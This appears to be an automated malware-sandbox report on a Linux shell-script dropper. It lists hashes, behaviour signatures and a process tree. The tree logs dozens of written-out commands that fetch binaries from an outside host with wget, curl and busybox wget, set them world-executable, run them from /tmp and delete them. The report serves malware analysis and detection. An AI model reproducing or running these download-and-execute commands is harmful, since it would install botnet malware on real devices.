Analysis
-
max time kernel
87s -
max time network
90s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
-
Size
10KB
-
MD5
5ad9fce74e2c2c2bc17e1c3c7c1e9699
-
SHA1
f6a06bb0801544767f9542e687c8970f4da13169
-
SHA256
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda
-
SHA512
70e49474c5684e1b77cc2e47abe567e6d5e8b0f7edfca79a7feefe0ae389462b6747c2841c31acb7168e04c121a563d887515cbdb75530dca80da2ade3b95d16
-
SSDEEP
192:MAM8A8b2OyaeCz0sbcqmss0xFw/3xe3rhxFw/3Vfqmsl3rD3A8b2OneCz0sT:MA0aeCz0sbcqmss0xFw/3oxFw/31qmsJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh1⤵PID:685
-
/bin/rm/bin/rm bins.sh2⤵PID:687
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:691
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:711
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:718
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:719
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:720
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:723
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:726
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:727
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:775
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:778
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:779
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:782
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:785
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:786
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:800
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:832
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:833
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:836
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:850
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:853
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:864
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:880
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:882
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:885
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:892
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:920
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:955
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:958
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:959
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:962
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:965
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:966
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:976
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:983
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:984
-
-
